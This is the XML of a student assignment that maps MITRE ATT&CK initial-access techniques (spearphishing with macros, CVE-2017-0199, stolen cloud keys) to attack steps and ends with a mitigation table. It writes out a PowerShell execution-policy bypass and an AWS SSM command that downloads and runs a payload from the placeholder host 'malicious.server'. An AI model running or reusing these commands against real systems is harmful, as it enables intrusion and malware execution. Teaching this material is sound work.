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F537" w14:textId="457BFF36" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
      <w:r>
        <w:t>Swayam Salunke (225)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C90112E" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
      <w:r w:rsidRPr="006A657A">
        <w:pict w14:anchorId="73B8B837">
          <v:rect id="_x0000_i1067" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEFCF27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✅</w:t>
      </w:r>
      <w:r w:rsidRPr="006A657A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> PoC Title: Initial Access via Cloud and Human Vectors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EAE2E8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🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="006A657A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Tactic: Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450FD305" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
      <w:r w:rsidRPr="006A657A">
        <w:t>Goal: Gain an entry point into the victim’s system or network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1F4082" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
      <w:r w:rsidRPr="006A657A">
        <w:pict w14:anchorId="107FFD3C">
          <v:rect id="_x0000_i1068" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FA7EF6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🔧</w:t>
      </w:r>
      <w:r w:rsidRPr="006A657A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Technique 1: T1566.001 – Phishing: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A657A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A657A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE58500" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
      <w:r w:rsidRPr="006A657A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2C1E7A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Collect target email addresses using LinkedIn and data breach archives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639A011D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Craft a fake business-related email (like an invoice or job offer).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2629AABA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Attach a malicious Microsoft Word file with embedded macros.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27875858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User receives the email and opens the document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E54F958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Macro triggers PowerShell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEE627C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powershell.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A657A">
        <w:t>NoProfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A657A">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A657A">
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A657A">
        <w:t xml:space="preserve"> Bypass -File payload.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10450DC2" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006A657A">
        <w:t>The payload.ps1 downloads and executes malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442D95BB" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
      <w:r w:rsidRPr="006A657A">
        <w:pict w14:anchorId="1922A5F7">
          <v:rect id="_x0000_i1069" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D60100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🔧</w:t>
      </w:r>
      <w:r w:rsidRPr="006A657A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Technique 2: T1203 – Exploitation for Client Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F11D36" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
      <w:r w:rsidRPr="006A657A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FA9402" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006A657A">
        <w:t>Create an exploit for a known vulnerability (e.g., CVE-2017-0199).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0CE014" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006A657A">
        <w:t>Embed the exploit in a crafted Word RTF document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFD2075" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006A657A">
        <w:t>When the user opens the document, arbitrary code executes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D2DD07" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006A657A">
        <w:t>This installs a reverse shell or beacon on the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C763C0C" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
      <w:r w:rsidRPr="006A657A">
        <w:pict w14:anchorId="6145ACED">
          <v:rect id="_x0000_i1070" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEA5E6B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🔧</w:t>
      </w:r>
      <w:r w:rsidRPr="006A657A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Technique 3: T1078 – Valid Accounts (Cloud Accounts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10350258" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
      <w:r w:rsidRPr="006A657A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA7AAC8" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006A657A">
        <w:t>Purchase or discover leaked cloud credentials (e.g., AWS/Azure admin keys).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274F9911" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006A657A">
        <w:t>Access the victim’s cloud portal (e.g., AWS console).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AFF5EC" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006A657A">
        <w:t xml:space="preserve">Launch a malicious virtual machine or use </w:t>
      </w:r>
      <w:r w:rsidRPr="006A657A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSM (AWS Systems Manager)</w:t>
      </w:r>
      <w:r w:rsidRPr="006A657A">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007A22EC" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A657A">
        <w:t>aws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A657A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A657A">
        <w:t>ssm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A657A">
        <w:t xml:space="preserve"> send-command --instance-ids i-abc123 --document-name AWS-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A657A">
        <w:t>RunPowerShellScript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A657A">
        <w:t xml:space="preserve"> \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689A7672" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006A657A">
        <w:lastRenderedPageBreak/>
        <w:t>--parameters 'commands</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006A657A">
        <w:t>=[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006A657A">
        <w:t>"Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A657A">
        <w:t>WebRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A657A">
        <w:t xml:space="preserve"> http://malicious.server/payload.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A657A">
        <w:t>OutFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A657A">
        <w:t xml:space="preserve"> C:\\temp\\malware.exe","Start-Process C:\\temp\\malware.exe"]'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BEF4E5" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006A657A">
        <w:t>Malware is executed silently within the cloud environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C5AF57" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
      <w:r w:rsidRPr="006A657A">
        <w:pict w14:anchorId="4907E2C7">
          <v:rect id="_x0000_i1071" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE44E48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🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="006A657A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Detection &amp; Mitigation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3521"/>
        <w:gridCol w:w="4400"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A657A" w:rsidRPr="006A657A" w14:paraId="16FDF1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C0A69" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006A657A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44800FD" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006A657A">
              <w:rPr>
                <w:b/>
                <w:bCs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295AAF25" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006A657A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Mitigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A657A" w:rsidRPr="006A657A" w14:paraId="54CA4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3EB1" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
            <w:r w:rsidRPr="006A657A">
              <w:t>T1566.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A26E697" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
            <w:r w:rsidRPr="006A657A">
              <w:t>Email gateway filters, macro usage logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="216903FA" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
            <w:r w:rsidRPr="006A657A">
              <w:t>Disable Office macros by default, user training</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A657A" w:rsidRPr="006A657A" w14:paraId="37D02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BB84" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
            <w:r w:rsidRPr="006A657A">
              <w:t>T1203</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EF3BA4E" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
            <w:r w:rsidRPr="006A657A">
              <w:t>Application crash reports, EDR alerts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="273F05D9" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
            <w:r w:rsidRPr="006A657A">
              <w:t>Patch management, use updated MS Office</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A657A" w:rsidRPr="006A657A" w14:paraId="58063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A1CA" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
            <w:r w:rsidRPr="006A657A">
              <w:t>T1078</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66AD940D" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
            <w:r w:rsidRPr="006A657A">
              <w:t>Cloud activity monitoring, login anomalies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C15B67A" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
            <w:r w:rsidRPr="006A657A">
              <w:t>Enforce MFA, rotate credentials, least privilege policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="011AAA9E" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
      <w:r w:rsidRPr="006A657A">
        <w:pict w14:anchorId="4E93CE99">
          <v:rect id="_x0000_i1072" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="77101502" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A657A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="006A657A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Why This PoC is Effective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F02F4F9" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006A657A">
        <w:t xml:space="preserve">It blends </w:t>
      </w:r>
      <w:r w:rsidRPr="006A657A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>social engineering</w:t>
      </w:r>
      <w:r w:rsidRPr="006A657A">
        <w:t xml:space="preserve"> (phishing), </w:t>
      </w:r>
      <w:r w:rsidRPr="006A657A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vulnerability exploitation</w:t>
      </w:r>
      <w:r w:rsidRPr="006A657A">
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="006A657A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cloud infrastructure abuse</w:t>
      </w:r>
      <w:r w:rsidRPr="006A657A">
        <w:t>—covering a wide attack surface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7CD496" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006A657A">
        <w:t>Demonstrates realistic attack vectors used in real-world breaches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F4806C" w14:textId="77777777" w:rsidR="006A657A" w:rsidRPr="006A657A" w:rsidRDefault="006A657A" w:rsidP="006A657A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006A657A">
        <w:t xml:space="preserve">Shows both </w:t>
      </w:r>
      <w:r w:rsidRPr="006A657A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>human error exploitation</w:t>
      </w:r>
      <w:r w:rsidRPr="006A657A">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="006A657A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cloud misconfigurations</w:t>
      </w:r>
      <w:r w:rsidRPr="006A657A">
        <w:t>, which are common in modern attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E281EC5" w14:textId="40FA9AC0" w:rsidR="006B57C6" w:rsidRDefault="006A657A">
      <w:r w:rsidRPr="006A657A">
        <w:pict w14:anchorId="1769A96A">
          <v:rect id="_x0000_i1073" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006B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950BA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5950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956A8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5502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6782C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1DE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D3D0C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7414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599844">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="581914183">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1724329459">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="184839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7A"/>
    <w:rsid w:val="00121DC3"/>
    <w:rsid w:val="006A657A"/>
    <w:rsid w:val="006B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7FDD"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8B8D77F5-2BD1-439C-9313-BC106C6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Salunke</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Swayam Salunke</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-03T12:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-03T12:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>